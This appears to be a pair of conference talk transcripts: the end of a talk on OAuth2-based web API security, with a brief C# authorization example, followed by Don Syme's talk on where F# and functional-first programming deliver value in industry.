Yeah? You can add a new client. You can tell which OAuth flows they are allowed to use. If they are using something that requires, you know, a callback, you can register the redirect URIs where you can call them back. So it allows you to pretty tightly lock down what this thing is doing. And now let me show you how it looks in action.
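And on the resource side, coarse-grained authorization against such an access token can be as simple as requiring a scope claim before the controller runs — a hedged sketch assuming Web API 2 and a claim type of "scope", which is a common OAuth2 convention rather than anything mandated:

```csharp
using System.Linq;
using System.Security.Claims;
using System.Web.Http;
using System.Web.Http.Controllers;

public class ScopeAttribute : AuthorizeAttribute
{
    private readonly string[] _requiredScopes;

    public ScopeAttribute(params string[] requiredScopes)
    {
        _requiredScopes = requiredScopes;
    }

    protected override bool IsAuthorized(HttpActionContext actionContext)
    {
        var principal = actionContext.RequestContext.Principal as ClaimsPrincipal;
        if (principal == null || !principal.Identity.IsAuthenticated)
        {
            return false;
        }

        // The token service put the granted scopes into the token as "scope" claims.
        var granted = principal.FindAll("scope").Select(c => c.Value).ToList();
        return _requiredScopes.All(granted.Contains);
    }
}

// Usage: reads need the "search" scope, deletes need the "delete" scope.
public class UsersController : ApiController
{
    [Scope("search")]
    public IHttpActionResult Get(string filter) { return Ok(); }

    [Scope("delete")]
    public IHttpActionResult Delete(int id) { return Ok(); }
}
```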
So let's run an application here called Flows — OAuth defines so-called flows, that's basically an orchestration of how clients can request tokens. And again, for the gory details come later to my talk. But one flow is the so-called code flow. And that's for that application client. So this is a web application. It needs to talk to a web API on behalf of the human that's sitting in front of the browser. Okay? So what it does is basically it goes to the authorization server, the user signs in. And now, based on the definitions you did in the UI, you get this consent screen here saying, hey, this client here tries to access an application called user management and it requests the read and the search permission. Do you want to allow that? Yeah. And that screen is optional. So if you're more in an intranet style of scenario, you can turn it off so that this is a silent consent, if you want that. But if I press allow, I come back to the application, get a so-called authorization code, and can exchange that code for an access token. And now with this access token, the application can actually call the web API. Okay? And it can store the access token. And this access token can be renewed, with things called refresh tokens. And again, we'll talk about that in a lot of detail later on. And at some point, if the user decides he's not happy anymore with that application accessing his data, he can go to kind of a self-service portal and delete the access. And the next time the application tries to renew the token, it will fail. Okay? So that's how it looks for web applications. If you're doing a client application, like a native application, for example, what you typically do is you open a web view. Yeah, so you're basically embedding a browser into a window in your application, which opens that consent screen, the user clicks yes. And then there's some communication going on between the web view and the client application to send back the token. And from that point on, the client application can access the token. Yeah. So when I do request token, I'm opening a web view here. And that's actually quite interesting. That's a new API in Windows 8, an operating system API that gives every application this feature of opening an embedded web view. And that's kind of a special web view here because the calling application can't intercept keystrokes and stuff like that. And also it doesn't have access to cookies that are shared with desktop IE, for example. So when I sign in here, I see the same consent screen. This time I only ask for read. And by the way, I could even uncheck that here. And now the application has the token and can access the web API. And I'm just echoing back the claims here. Okay? The last thing, I guess, is that you can do all that without user interaction. That is what comes closest to WS-Trust, if you have done that in your past. Where basically the client itself has the credentials of the user and sends them to the authorization server and gets back a token in response. Okay? Without all the user interaction stuff. Yeah. And just to show you that this is actually used, yeah, so here is the Twitter application, which is opening a web view, right? And that's the consent screen. So I'm logging in here and say, authorize app. And from that point on, the Twitter client can access the Twitter data on my behalf. Okay?
And the other approach, the one without the user interaction in the web view, is done by Dropbox, where they collect the credentials directly, take these credentials, go to the authorization server, get back a token in response and use the token to access Dropbox. Okay? So that is really the pattern that you want to prefer. Once your application is kind of in that category where you have many web APIs, many clients, users using different clients, maybe even throughout the day, you know — like maybe at daytime they are in the intranet using, like, a corporate, officially blessed client application, yeah, which does all kinds of things. But on the road they have their, you know, their mobile device with them, where you have, like, a company-deployed mobile application, which maybe has less access because, you know, just in case this thing gets stolen, we have some, you know, backup plan so that, you know, you can't delete everything with that, whatever, yeah? Or maybe you have third parties building on top of open APIs that you are building, and then you can't control them in any way. But the way you can, you know, manage all that is by having the abstraction of an authorization server and application scopes and access tokens. Okay? And with that, you can, you know, kind of get a better handle on these kinds of complex scenarios. Okay? So that's what I want to show you. You're seeing it here first. Actually, you know, like in a museum when you unveil a statue — I should do one last thing. I should make it public. So here, settings, go to the scary part. And, oh, holy crap. I didn't test it, obviously, yeah? So where's GitHub? GitHub. Yeah, here we are. It's public, okay? So if you like that approach, thank you. If you like that approach, use it. It's in a very early stage. And by the way, I also have written a little bit of documentation already, yeah? It's a little bit. Try it out. Give me feedback. There's an issue tracker. If you have ideas, you know, feature ideas, problems, whatever, give us feedback. And yeah, it's now public. We can shape this thing, okay? And I think it's tremendously useful for building these applications. Cool. So I guess to sum it up, we went from a very simple model, from, you know, username passwords, to having tokens instead, yeah? Having the authorization server inside the actual application, to factoring it out to a separate authorization server, to having a management system for these types of applications. You've seen CSRF, which is something you should care about. My best advice is go away from cookie-based authentication. The next version of the SPA template in Visual Studio 2013 will be a SPA template without cookies. It will use the exact approach I just showed you: authorization server, OAuth flow, password in, token out, no cookies anymore, okay? So that's my advice. If you go cross domain, get friendly with CORS, yeah? You can't escape it if you are in the browser. And otherwise, yeah, think about your architecture in terms of access tokens. That helped me tremendously in securing applications once they got more complex and so on. Any questions? Yeah? That's being worked on right now, but nothing official yet. I can't say it's coming, but I think it's coming. Otherwise, it would be not too hard to write it yourself. If it's not coming, ping me, I will write it for you, okay? Okay, then thanks for your time and see you later, hopefully. Thank you.
|
Modeling web services using the HTTP API approach has become pretty much the standard. This also means that these APIs must be ready for all the security scenarios around identity and access control. These range from simple username/password and service-to-service communication, through enterprise integration, to token-based authentication and delegated authorization. In addition we also have to deal with different client types like native desktop or mobile clients, browser clients and classic web applications. Dominick shows you how this all comes together.
|
10.5446/51413 (DOI)
|
Okay, everyone. Am I on? Hi, everyone. Thanks for coming along. It's my second talk here today. I kicked off the first technical session with a technical talk. And it's just lovely to be in Oslo. Thanks for so many people coming along to this one. My name is Don Syme. I'm an F# community contributor. And I also have a role as a principal researcher at Microsoft Research. And, yeah, this talk is less technical than my first talk was. And it's really born out of a number of things. I've been working as part of the team bringing you sort of .NET language improvements — F# as a language, a lot of improvements in C# and .NET over the years as well. And I think as I've been working with people adopting improved programming language techniques, I think I've become a bit frustrated with how we talk about why these techniques actually matter in practice. We have a lot of language wars. We have a lot of arguments about why things are good or bad or what's the right way to do things technically. And we sometimes lose the big picture about why these things make a difference in industry. Now, we being perhaps the language designers, we being the people providing technologies in core teams, either at Microsoft or in the open source world — most of you work in industry and you know full well what a difference better language-based technologies can make in practice, and what harm they can inflict in practice as well when used incorrectly. So in many ways this should be reinforcing what a lot of you know intuitively about programming language techniques. But if you want technical talks from me like I normally give, then there's a whole lot of great F# videos, most of them from other people, not from me, at fsharp.org slash videos — over 100 videos about F# to watch there. If you want an overview of F# 3.0, there's one from Dustin Campbell at Microsoft at TechEd 2013, a wonderful talk he gave there just last week, and there's also the recording from session one today. So, but today I want to talk about the problem domains where F# seems to work particularly well, where it seems to give particularly large advantages to companies adopting it: in areas of data engineering, analytical programming, calculation engines and financial engineering, and also general coding, but particularly the first four kinds of areas. And this is sort of focusing on how we can talk about a technology like F#. It also applies to other what I'd call functional-first programming languages — languages like OCaml to some extent, Scala to some extent, aspects of C#. And it's based on really a lot of informal observations of more than 30 successful F# adoptions in industry, and trying to bring out why F# succeeds in some particular areas and what are the common themes we can bring out there. And concretely the talk comes from conversations I've had with a guy called Matt Harrington, who works on the Microsoft DPE team, who introduced me to a wonderful little book. How many people have read this book, Spin Selling? Ah, great. On my recommendation, or separately? Okay. It's an excellent book by Neil Rackham from the 1990s. It could probably be updated for the internet era, okay. But it comes from experiences of selling technical products, complex technical products, as opposed to sort of how to close a sale if you're selling a vacuum cleaner or something like that, how to get that magic closing moment in a sale. It's not that kind of marketing book.
It's a marketing book about, like, selling computer systems for IBM, for example. And how, when you're talking about a complex product with a customer, there may for instance be many decision makers involved in adopting a new major computer system. There are many decision makers involved in adopting a new programming technology in the sort of organizations we work in. And so we need to think differently about how we talk about these kinds of technical products, perhaps, than we normally do. So the marketing methodology is called Spin, which is quite fun. It's based around this situation, problem, implication, and need methodology. And I would recommend you take a read of that. So let's talk this through from the F# perspective, from the functional-first programming perspective. And we'll look at it just generally at first, then look at some concrete case studies, and then look at how that maps through to the technical features of these kinds of languages. So the recurring business situation which we're looking at here is: I lead a team developing online data processing components, financial modeling components, insurance calculation engines. I lead a team developing a trading platform, an algorithmic trading system, an online recommendation engine, a bioinformatics algorithm — sort of a disparate range of applications of programming. And let's try and simplify this and summarize that down to situations where people are developing analytical components, data-rich components. You can call them either of those. There are what I would characterize as two kinds of people: the analytical programmer and the data engineer. And often problem domains bring in one or both of those components. So that's the general situation where we are. So sometimes when I talk about programming I like to do this split. We're very familiar with this kind of split in our architectures. We have some coding in the middle where we have analytical programmers of some kind. We have data layers, data, information and services — we have a lot of data engineering people over here. And then we have these people over here doing the front layer, the design, presentation, publication and UI. So in this talk we're focusing on the situation over on the left more than over on the right. So what are the recurring business problems that people actually have? When you talk through the actual business needs of these people, what are the problems that they are facing? The recurring ones we want to have at the top of our mind are time to market, time to deployment for the components. How fast they run is a key problem that people will talk about. Whether they're correct or not, and whether they're actually able in some sense to do the software at all. Whether they're able to tackle the complexity of the problem domain with the programming tools that they have available. And these are related — I mean, obviously time to market, achieving certain efficiency, correctness and complexity goals, is the big one. It's all about whether you get the software to market in time, to deploy at the right level of quality and efficiency, and actually tackling these complex problems for analytical components. So that's the fundamental situation and business problem we're faced with.
A key part of drawing out why functional-first programming will make a difference in this kind of situation is to focus on why those problems are actually really severe problems that map through to real dollars for businesses. So what happens when you don't get a financial model to market on time? Let's take one of these business situations: an insurance company who has to adjust, for example, to regulatory changes in the insurance industry, and let's say they have a current turnaround time of six months from their actuarial department making a change to their model, through the R and Mathematica models that the actuarial department used, through to their translation into the C++ code that's actually put onto the deployed system. And with a six month turnaround time, being late to market in that kind of analytical component development would just mean you'll miss entire business opportunities. You simply won't be able to enter the market. And that's a recurring theme in all of those industries: if you can't get a bioinformatics algorithm implemented and out the door in time for your core team, for your bioengineers, to assess a particular new product, then your entire startup or business may fail. So is correctness a problem? And again this is very important to keep in the back of our head: why is it that functional-first programming applies in particular domains more than others? And in these domains that we were just talking about, correctness is absolutely a really big problem. I mean, you can get away with an algorithmic trading system that has a few bugs or a few approximations in it if you're lucky, but then you might just make that one mistake that actually brings down your entire hedge fund or your entire trading group because it goes wild with incorrect trades. But on the whole, in those kinds of components, buggy models will lead to incorrect values, risks and trades, which will correlate through to full-on, exact, you know, dollar loss in your systems. If you have buggy services then you might incur reputation loss, and if you have buggy products then you'll get lost customers. Is efficiency a problem? Absolutely. In these finance and trading settings they frequently have a 13-hour window overnight where they have to value the bank, and if they can't get the numbers on the desk by the next morning within that 13-hour window, then, you know, that is a hard limit. They have to have it there, or else the bank can't actually run its operation and they're operating without updated valuations and risks. Efficiency in services and products leads to, again, the obvious examples of not being able to scale out your services, or slower products. But perhaps the most interesting theme that runs through case studies where functional-first programming is effective is the question of complexity. And I think it's a question that we don't talk about enough in software: what's the software that we weren't actually able to implement? Okay. If you're in a trading situation and you simply can't implement the software to model the financial products that are being traded, then you effectively can't participate in certain markets.
You're just unable to be a competent player in certain domains. The same goes for all of the previous domains of work where we talked about the various situations. If you can't do your bioinformatics algorithms in time, or you simply can't model or implement them at all, then you would just get failed project after failed project. Okay. So, is complexity a problem? In these situations, complexity is absolutely a fundamental problem, as is correctness, efficiency, and timeliness in delivery. So those are the recurring business problems, and they are severe problems that lie at the heart of software delivery in these kinds of domains. Yeah. One of the big recurring business problems that I see is wrong product. Yeah. Does that feed into it? I don't think so. There are all sorts of things where improved programming techniques don't help. Okay. And I think part of this is trying to be clear about what better programming helps with and what it doesn't help with. And I come to an important part of that in just a moment. I'll talk about it now. So complexity — tackling complexity is crucial in the kind of domains I've talked about so far. And that happens to be the domains where functional-first programming is particularly effective. But in user interface work, the situation is extremely different. It's interesting in two ways. One is that asynchronous programming is hard to get right in user interface programming. And you see these functional asynchronous programming techniques that we now see in C# and F# and going right through the industry are critical for tackling that part of the complexity of user interfaces. But on the whole, user interfaces are about making — you have to make a simple thing, not a complex thing. There's just no point in being able to implement really complex user interfaces, right? Nobody wants it. It's wrong, okay? And that's why functional programming isn't culturally, in some sense — it's a perfectly good implementation tool. You can do wonderful asynchronous programming. But, you know, on the whole, it's a design problem, which is sort of what you say: wrong product. You have to make simple things. Yeah. Yeah. Well, there's another aspect here which you could fold into this kind of discussion, which is about time to failure and investigation of problems. You want a faster time to fail when exploring the design space. And I think, again, functional-first programming has a key role in, you know, finding out that you're doing the wrong thing sooner. Okay. But that's a slightly harder one. And I wouldn't say that I have data to back that up. Occasionally you get people saying, yeah, we discovered failure faster, but on the whole people don't talk about that. But I think you could draw that out much more as a theme. Yeah. Okay. So the need in these kinds of domains is analytical programmers delivering correct, efficient components in the enterprise on time. Okay. This, at its core, is what F# is about as a programming language. But I'm not just talking about F# here, although, I mean, it's obviously focused around my experience with F#.
But functional first programming is really about addressing that set of needs. It's one set of problems that functional first programming helps solve. And the question is why? And really when it comes down to it, at the core of every functional first language is just a fabulous problem-solving, set of problem-solving tools. Okay. Simple, correct code for complex problems. You can just churn out correct analyses and correct manipulations of data very, very rapidly in these, in these, the Haskell, Scala, F-sharp, OCaml, Erlang, to some extent, a kind of programming environments. They're just really wonderful tools for getting things, for doing correct manipulations and solving software problems. A key aspect on this time-to-market side of things is interoperability. And I hadn't appreciated just how important this was as a reason for, in particular for these interoperable functional languages, F-sharp and Scala for being so successful. F-sharp is an odd language because you can adopt it for just one part of a larger solution. Okay. You can have really 20 of your projects being C-sharp projects and just one or two being F-sharp projects. We see that and you'll see that in some of the case studies that many people start their F-sharp adoption that way. Some people, some people liked it to ask me, how can we get started? How can we get our enterprise to adopt F-sharp? And I say it's easier. You just go right-click, add project, F-sharp. Right? It's not that hard. And you just get, and then ask forgiveness later. So, but because you can develop these components in a way that just can integrate directly into these larger C-sharp solutions, your functional code is just part of the larger solution. And in particular, what that means is in these kind of shops where you have some kind of analytical software development going on, perhaps in R, perhaps in Mathematica, perhaps in Python, perhaps in some other system, then often these shops have a translation stage where the analysts work in these systems and then that code has to be put over to the IT shop and re-implemented in C-sharp and C++. And honestly, that process can be six months long, not only that, but in the case of one shop we know of which translates Mathematica to C++, they do it in a way that uses this macro-wise kind of C++ in order to make sure the semantic stays the same. And then the C++ ends up doing deep copy and cloning of every object almost at every step of the way and actually ends up not particularly efficient as a result. And so you're not even getting the real benefits of the deployment in C++ in this environment, but you honestly, you can just eliminate six months from your software development process in some of these key analytical departments of a business by moving to an environment like F-sharp. And it's very hard to eliminate six months out of a software development delivery pipeline any other way. That's just savings of that magnitude are just extremely hard to engineer. A key thing from my perspective, I'm a big fan of these strongly typed functional programming languages, the F-sharp, so to some extent sort of the C-sharp functional programming subset as well, because these are strongly typed and we get great unboxed representations of integers and numbers, we can get.NET generics all the way down, and that lets us maintain efficiency in this analytical code in an absolutely key way, and you get performance equivalent to C-sharp and Java and sometimes C++, so we love that. 
And then this key thing: they help analytical programmers tackle more complex problems. So that's the need being met by this class of programming language. Functional-first programming helps through simple, correct, robust code; interoperability eliminates entire phases from the software development process; strong typing gives efficiency, or can help enable efficiency; and above all it empowers analytical developers to solve more complex problems. So let's take a look at some of the case studies where we've seen this actually work in practice. What I've done here is taken some of the testimonials that are available on the F# Software Foundation pages. So if you come over here, this is fsharp.org, and there's a wonderful set of testimonials provided by people, a whole range of them down here, which you're welcome to take a look at. And there are permalinks here if you want to send them around to people in your communities. So for this first one, I've taken those testimonials, some of them, and just brought out where they're pulling out these common themes. This is a power company in the United Kingdom, and they use F# for a calculation engine to help decide when the power stations come up and down. The application takes a set of input feeds from the energy market around Europe, and there's a lot of data engineering and manipulation around the edges. Every country has to publish the amount of energy going in and out of the national boundaries, and it used to be, for instance, that Finland only published those as a bitmap, a GIF, and they had to do optical character recognition on the GIF in order to read those off. That's changed now; supposedly they publish an XML feed or something, but that's fine. The market signals aren't coming in that rapidly, but you still have to write very accurate analytical code to react to those market signals, in order to change the decision about whether you're going to spin up a power station or not, on the expectation that there's going to be a need for it in a particular country. And so F# is key to that implementation. The people who did this implementation brought out a deeper analysis of what it was about F# that technically helped them: interoperation, units of measure in helping to make correct code, exploratory programming with F# Interactive, drawing out the link between functional programming and unit testing, no complex time-dependent interactions to mess things up, parallelism, code reduction, and a lack of bugs. But when you think back, how does that map onto those four big themes? Interoperation is really about time to market and deployment. Units of measure is correctness, exploratory programming is just time to market or time to deployment, or time to fail in that sense. Parallelism is about efficiency, et cetera, and lack of bugs is of course about correctness. So it's those four big themes that keep coming up. If you look at case studies in finance, these are two older case studies, one from Grage Assurance and one from a major European anonymous finance firm who've got a major core component group of over a hundred developing all their financial models in F#. And again, time to market and correctness and efficiency are the things that come out. 
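To make the units-of-measure point from that power-company testimonial concrete, here's a minimal sketch; the units and numbers are my own illustration, not figures from the case study.

```fsharp
[<Measure>] type MW   // megawatts
[<Measure>] type h    // hours

let capacity = 400.0<MW>
let duration = 6.5<h>

// The compiler tracks the units: energy has type float<MW h>.
let energy : float<MW h> = capacity * duration

// Mixing units up is a compile-time error, not a runtime surprise:
// let nonsense = capacity + duration   // does not compile
```

That is the sense in which units of measure map onto the correctness theme: a whole class of numeric mistakes simply cannot get past the compiler.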
F-sharp and insurance, a large actuarial company, they're using F-sharp for core actuarial components, quickly create a system which will perform the calculations highly efficiently and parallel with the perfect match to the spreadsheet results. And again, it's just those themes, time to market efficiency, correctness. The trading platform, this is done by a company called Treyport, making use of asynchronous programming heavily and time, again, another way of saying that it tackles complex problems experience, F-sharp developers regularly solve problems in days that would take weeks for using more traditional languages to solve and complex problems in an elegant and highly maintainable manner. So, maintainability, complexity, time to market. It's not just about F-sharp, the other people adopting these functional first languages have reported extremely good results as well. OCaml, this is some slides based on a 2006 talk, quite an old talk now, but from a company called Jane Street using OCaml, language heavily strongly related to F-sharp, and they brought out this thing, robust performance of readability. Now it's interesting looking at this thing, they say that the way they write this up, yeah, they say the performance is better and better modularity, new systems implement strategies more complex than previously possible. I think that's an interesting point where I kind of wish they had gone that one extra step forward to explain why being able to implement more complex strategies actually made them money, because it's not necessarily the case. You don't want people just sitting around making, hey, I got to implement a more complex user interface than I ever could before, isn't that great? You want those people to just leave your company as fast as possible. But in this kind of setting, in a finance setting, that's just completely different. Implementing complex things is fundamental to the modern financial industry, for better or for worse, but that's how financial software is these days. F-sharp in biotech, similar kind of area, F-sharp ROX, building algorithms to DNA processing, it's like a drug, et cetera, it's a great comparison, great comparison about Python. Python is a great language, achieves many of the goals set out here, but the actual F-sharp code is 20 to 100 times faster to run and faster to develop. So in units of measure we see efficiency, correctness, faster to develop, times of deployment. F-sharp and advertisement and ranking and rating at Microsoft, again rapid development of prototypes, of code. Again, it's an interesting thing that we use this engine to simulate the auctions done on, so when we show advertising on the right hand side of Bing's results, for example, there's an auction is run behind the seams, a second price auction. And a key thing is to make sure you can't game the system, okay, by putting lots of extra fake agents into the system, for example, or by collecting information where other people, you know, that other people may not have access to, could certain players kind of, yeah, effectively game the system so nobody else, so they get better prices than everybody else. Yeah, it's quite complex to do those computations and simulations. And again, a key place where F-sharp actually gives good, excellent results in core components. A more recent case study is F-sharp at Kaggle. Kaggle is a bit of an iconic data science company. They run competitions for data scientists. It's crowdsourcing of data science. 
You can put your data sets up there as a company, put a sample of the data set up, and invite people to try a particular analysis or prediction algorithm on it. Then you get to take their algorithm; you put a bounty up saying the person who produces the best algorithm will get a certain amount of money, and then those algorithms can be run over larger data sets. It's a really very interesting business model, and internally at Kaggle they use F# for their core data analysis algorithms. The same sorts of things come out about correctness of code, and they're moving more and more of their code to F#. Okay, so from what I see, the data sort of agrees that the places where F# is particularly successful are where simple correct robust code, interoperability, strong typing and solving more complex problems are the common themes. Right, just to give you an alternative view; this is satire, so it's actually not an alternative view, it just looks like one. Ten reasons not to use a statically typed functional programming language. This is: I don't want to follow the latest fad, etc. I get paid by the line. I showed some of this this morning for those who were there, so if you prefer to program like this because you're paid by the line, then that's just fine; if you get paid by the line then you're not going to like statically typed functional programming. I love me some curly braces. Okay, if you're addicted to the curly braces then it's not going to be your sort of thing. I like to see explicit types. That's fine; if you prefer that kind of thing in your C# or Java, then that's fine. If you prefer declarative approaches where the types are all inferred, like in F#, then that's rather more your thing. I like to fix bugs. Okay, yeah. Nothing quite like the thrill of the hunt, finding and killing a nasty bug. And if the bug is in the production system, even better, because I'll be a hero as well. Okay, that's what you want. And I know, I've been there; I've been down implementing in the .NET runtime and finding those bugs in the C++ code. Okay, I live in the debugger. I don't want to think about every little detail. There is something about these strongly typed functional programming languages that actually makes you cover cases, cover the edge cases in your code. Pattern matching as a construct in these languages in particular just means that as you take a financial model in and you write an algorithm over it, you have to cover all the cases of the code, or the code will give you a warning or it won't compile. And that's at the core of why strongly typed functional code ends up more correct. I like to check for nulls. I'm very conscientious about checking for nulls in every method; it gives me great satisfaction to know that my code is completely bulletproof as a result. Okay, haha, just kidding. Of course I don't actually do that everywhere. Okay, design patterns. These strongly typed functional languages do use design patterns, but they de-emphasize them in comparison to the object-oriented languages. And it is sometimes hard for people to get used to the fact that we don't talk in terms of strategy, abstract factory, decorator, proxy; that sort of language just tends to get thrown out. Big-picture design patterns do stay around, like the sort of MVVM kinds of models, design patterns and the like. 
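To make the pattern-matching point concrete, here's a tiny sketch over a toy instrument model of my own (not one from the talk). If a new case is added to the type and not handled in the match, the compiler warns about the incomplete match.

```fsharp
type Instrument =
    | Bond   of float                     // coupon
    | Equity of string                    // ticker
    | Swap   of Instrument * Instrument   // receive leg, pay leg

let rec describe instrument =
    match instrument with
    | Bond coupon      -> sprintf "bond paying %.2f" coupon
    | Equity ticker    -> sprintf "equity %s" ticker
    | Swap (recv, pay) -> sprintf "swap of (%s) against (%s)" (describe recv) (describe pay)
```

That obligation to cover every case, checked by the compiler, is the mechanism behind the correctness claim.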
And then people say they say it's too mathematical but that's actually a cultural problem in the functional programming community, functional first programming community. So I would actually agree with that that we use, we have to change the culture of functional first programming because it's not actually hard at all. Okay, we should have a little private chat about nulls I think. You know, the evil that is nulls in the programming languages that are most common in the industry today is absolutely awful. Okay, how you can have data structures where at every point of the way the data might not be there. How you can reliably write code where you have to compensate at every single object, every single list cell in a linked list, every single place in your code, your data might not be there. I mean imagine taking this talk and then just like randomly replaying thousands of variations where words get deleted out of nowhere and then you still have to kind of interpret and cope with all these different possibilities. It's so, so pernicious and so ridiculous that I would honestly say that the number one reason for moving to a language like F sharp or to languages that were nulls and not the default is because of that. So the gains you get from not having to think about null as a routine part of your programming is absolutely enormous. And I just do not see a way forward for the existing languages in industry in C-sharps or Java or other languages. Maybe I'm wrong and someone will find a way forward for those languages where we can get to a non-nullness being the default but it's really looking bad from that I'd say. So we honestly just moving to a language where null is not the default is just enables people to do so much more productive, such more productive things with their time than worrying about sort of the absence of random objects along the way. Okay. So that's the common themes for why functional first programming is effective in practice, in industry and where it's effective. Just a mapping those through to where we have rolled out, where we've been aiming with F sharp, especially from the Microsoft perspective of F sharp. I'll talk about that a bit more but this should be seen as sort of visual F sharp, visual F sharp's focus. Visual F sharp 1.0 and 2.0 is focusing on sort of this middle part code analysis and algorithms, visual F sharp 3.0 through the type provider feature which I talked about this morning was focusing on data information and services. Okay. On the presentation UI and design side there are actually some great F sharp based solutions. This web sharper compiling F sharp code down to HTML5 is a great way of doing UI but on the whole we have at for the Microsoft anyway we focus less on the user interface side of things for the reasons I've explained about so far. Some other ad hoc lessons from industry, so much of the work that you know as end users of F sharp that you really need to do is to work out how to combine it with existing components and there's a lot of variations. You might for instance have to combine F sharp on the server side with an Oracle database on the back end and you might be using a C sharp front end silver light that's a trading company. The trading platform is used silver light as its trading front end. You might have to take F sharp and combine the C plus components. You might have to take F sharp and a GPU framework for example. 
You might have to take F sharp and have it working with Hadoop and service stack for example but again it's combining these technologies is a key part to being successful and not necessarily expecting there to be an F sharp sort of specific version of each of these technologies but learning how to make F sharp work in conjunction with these other technologies is a huge part of what it takes to adopt it successfully. It takes a surprising amount of time to build capabilities in functional first techniques. I mean it's like some anecdotes for people adopting F sharp. Some people say yeah we're a team of two F sharp programmers in a larger.NET team. One guy's job is to implement everything in F sharp. The other guy's job is just to delete the C sharp code that the other people write. I've honestly heard that. Another one is offshore teams versus onshore teams. That's a really interesting thing when you look at it from the first world perspective. The first world is having a major kind of competitive problem with like sort of outsourced industries in the developing world providing good software delivery and as industries, as physical industries, manufacturing industries know the key way to stay competitive is better tooling. That's obviously the German for example or industrial base of real manufactured goods know that the key way to stay competitive in the modern world is through better tooling. We actually see first world programming teams adopting F sharp in order to be able to stay competitive against much larger teams of programmers in the developing world. Some of the statistics that have come through from that are quite amazing. You get like functionally equivalent systems or ones where the F sharp system has more functionality and the F sharp system is 7,000 lines of code and the C sharp system coming from the outsource group was 200,000 lines of C sharp code. So a factor of like 25 difference in the end result. There's a couple of factors that play there. One is the programming language and one is the different kinds of programming teams and different kinds of cultures in the implementation. But it just shows you that you can take very different approaches to software implementation and that can map through from the language and tooling you're using. The building capabilities in functional first techniques definitely takes time. Training is totally key. People typically adopt by trialing on specific components, prototyping and testing and exploration and just using that one F sharp project and then extending out from that point. I've seen people fail with F sharp because they've tried to rewrite entire systems in it even though they're stable and working and that's just crazy. And also fail because they don't reuse C++ high performance components and they try to rewrite everything in managed code. That's a good system failure in the C sharp world for the same reasons. I'm certainly not saying these lessons are in any way unique to F sharp. This is just bread and butter for many kinds of software adoption and adopting new tools. But for some reason people can just forget that they need to do these things. A little bit about what's going on with F sharp more broadly. Just check the time. We have plenty of time. So I'll probably wrap up a little bit early just to give you a taste. I mentioned this this morning. It's really important to make this distinction between the visual F sharp tools which are part of Visual Studio and compared to F sharp as a language. 
F sharp as a language is open source and cross platform. And in many ways you don't even need to approach F sharp as a language through any Microsoft kind of perspective at all. And that comes through in this F sharp.org here if you are the F sharp software foundation. If you would like to use F sharp on Mac or Linux or Android or iPhone or HTML5 or Free BSD, this is the place to find out about that. So it's and this is all the mission statement of the F sharp software foundation is very interesting. They're quite happy for Microsoft to be the main contributors to the language and do the tooling on Windows. Because Microsoft do that extremely well on Windows. And they see their job as about promoting and protecting F sharp generally and to take F sharp onto all these different platforms and offer all sorts of different tooling. You can get IntelliSense, F sharp in Emacs for example. You get autocomplete while using Emacs using the tooling that's provided through the F sharp software foundation. If you want to run on Android and iPhone and iPad you can use the Xamarin tooling. And if you want to find out how to use F sharp with Amazon for example you can find that out with the cloud programming under here and so on. And if you want to be a part of the F sharp software foundation you can just join up either as a founding member. They're just starting some working groups in different areas. And if you want to contribute to this website you can just join in to send a pull request to the website on GitHub and they can integrate it very quickly. So you can, there's a great place to participate in the community and the organization. Now that's F sharp org. So I think that's changing perspectives. F sharp certainly grew up as being sort of for Windows. And so now F sharp runs on many platforms. And I think a new kind of thinking where it used to be that I think Microsoft can sometimes play the role of sort of being the popes in a way or being like the popes in the cardinals and people wait for the puff of smoke to come and from Microsoft and say well there's a new version of Visual Studio coming out. I wonder what's in it. And that's, we're kind of changing that to be, it's much more about Microsoft contributing to F sharp. And lots of other people contribute as well. So we see Xamarin for instance giving support for F sharp on iPhone and Android and lots of other community and startup groups contributing as well. So we see now that F sharp doesn't just have Visual Studio as its IDE but you can use Xamarin Studio, you can use Mono develop and you can use Emacs and Vimal and all sorts of other tooling as well. And so this is a bit of a tour of what's going on in F sharp. That's not to do with Visual Studio. So there's a great sort of set of tooling which is taking the F sharp implementation and hosting it. It's actually taking the F sharp type provider mechanism which allows you to interoperate with all sorts of things and exploiting that to place F sharp alongside interesting application context. So F sharp hosted alongside Excel and with very nice interop between the two. There's F sharp hosted as a scripting language for a 3D CAD system which is a lot like AutoCAD called Rhino. There's using it for data analytics or for web or for Hadoop and data analysis applications. So very interesting and it's there. There's this tool called WebSharper which allows you to do full HTML5, it compiles F sharp down to JavaScript, full HTML5 development using F sharp. 
It uses a type provider model to access through to the type script, strongly type views of JavaScript components. And this slide is provided by Intellifactory and is just summarizing some of their experiences with that tool. There's also another community component, open source component to compile F sharp to JavaScript and again uses a type provider for TypeScript files, TypeScript header files for interop. There's the people who do WebSharper have got an online development environment called CloudSharper which is an F sharp development environment in the cloud. Again this slide is provided by Intellifactory and some other developments at Microsoft is F sharp 3.0 which is the features I talked about this morning. We've been working on helping to show how F sharp can be used with Azure for scalable service programming. We've done some currently experimental work with F sharp and Hadoop for big data programming and there's some interesting components of Microsoft called Cloud Numerics for scalable math programming which you can get in there in lab status at Microsoft. And I've talked about some of these things. There's some other frameworks one called Embrace and this is work done by the community, some of which I've talked about already. Okay, I'll skip this part here. Okay, and I'll wrap up by saying functional first value languages deliver real value in particular areas. We see that again and again in the case studies. And the key things are reduced time to market, correct, rapid, correct development, efficient execution and solving complex problems accurately with maintainable code. And from the F sharp perspective, you can certainly use it to succeed in functional first programming in industry today. It's open source, cross platform, strongly typed and supported and there's lots of interesting work going on in applying it in web and data and cloud arenas. And learn more at fsharp.org and I would love to take questions and I've finished a little early and so once we're over, go and have a coffee. Okay, yeah. So what is the alternative to using nulls like that? You talked about not having to use nulls. Oh, so in F sharp, when you define a type, you can't use null with that type by default, okay. You can put some annotations on that allow you to use null and if the type comes from.NET libraries, you can use null. Okay, that means when you, for instance, if you have an object coming in as a parameter to an F sharp function and it's got an F sharp type, then you know it's not null. You don't have to check for null. Okay, you know a value is not null and that's normal in languages like OCaml and F sharp. You just don't have null at all, okay, in some of those languages. And so some things, there's a whole set of decisions. You need design decisions very carefully made in F sharp all the way through to support the fact that things are, you don't need null. Okay, there's a couple of places where you might need null when initializing arrays, for example, they might initially be null and so there's some backdoors for creating an array with undefined values and then populating them as necessary. But in routine F sharp programming, values just type simply don't have null as a legitimate value or a normal value. So, yeah. 
